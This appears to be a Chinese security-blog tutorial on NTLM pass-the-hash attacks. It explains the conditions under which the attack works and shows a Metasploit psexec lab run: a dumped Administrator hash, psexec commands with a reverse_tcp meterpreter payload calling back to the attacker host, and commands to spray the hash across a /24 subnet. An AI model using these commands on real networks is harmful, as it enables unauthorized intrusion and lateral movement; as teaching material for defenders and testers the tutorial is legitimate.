目录
一. 哈希传递攻击
MSF进行哈希传递攻击
一. 哈希传递攻击
接上一篇我们获取到了哈希值并对哈希值进行破解 Pass-the-Hash攻击,但是破解不出来咋办?哈希传递攻击是基于NTLM认证的一种攻击方式。哈希传递攻击的利用前提是我们获得了某个用户的密码哈希值,但是解不开明文。这时我们可以利用NTLM认证的一种缺陷,利用用户的密码哈希值来进行NTLM认证。在域环境中,大量计算机在安装时会使用相同的本地管理员账号和密码。因此,如果计算机的本地管理员账号密码相同,攻击者就能使用哈希传递攻击登录内网中的其他机器。
哈希传递攻击适用情况:
在工作组环境中:
- Windows Vista之前的机器,可以使用本地管理员组内用户进行攻击。
- Windows Vista之后的机器,只能是administrator用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问。
在域环境中:
- 只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器。
MSF进行哈希传递攻击
有些时候,当我们获取到了某台主机的administrator 用户的密码哈希值,并且该主机的445端口打开着。我们则可以利用exploitlwindows/smb/psexec模块用MSF进行远程登录(哈希传递攻击),这个利用跟工作组环境或者域环境无关,即在工作组环境中也是可以利用的。这个是rhost可以是一个主机,也可以设置一个网段。
这里目标主机的WindowsVista之后的机器,所以只能使用administrator用户进行攻击。
1. win7实验
(1)使用administrator用户进行攻击
加入了域环境
使用的本地administrator进行登录
提权到system获取到了hash值:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
哈希传递攻击如下
use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.4
set rhost 192.168.1.7
set smbuser Administrator
set smbpass aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942 #这里LM和NTLM我们已经获取到了
exploit
攻击结果如下,成功进行了登录
此时可以进行哈希传递,如本地与win7同网段的还有一个win2012机器,由于方便管理win2012的账号密码和win7是一样的,所以我们利用哈希传递尝试进行登录win2012。
将目标机器换成win2012的ip
set rhosts 192.168.1.6
如下,成功登录win2012,这就是哈希传递攻击
如果是在真实环境中,我们可以将rhosts换成一个ip地址段,如下
set rhosts 192.168.1.0-192.168.1.10
或者
set rhosts 192.168.1.0/24
程序在一个个尝试进行登录,如下是登录成功的
(2)使用本地普通用户进行攻击
使用本地普通用户哈希传递攻击是不行的。
持续更新....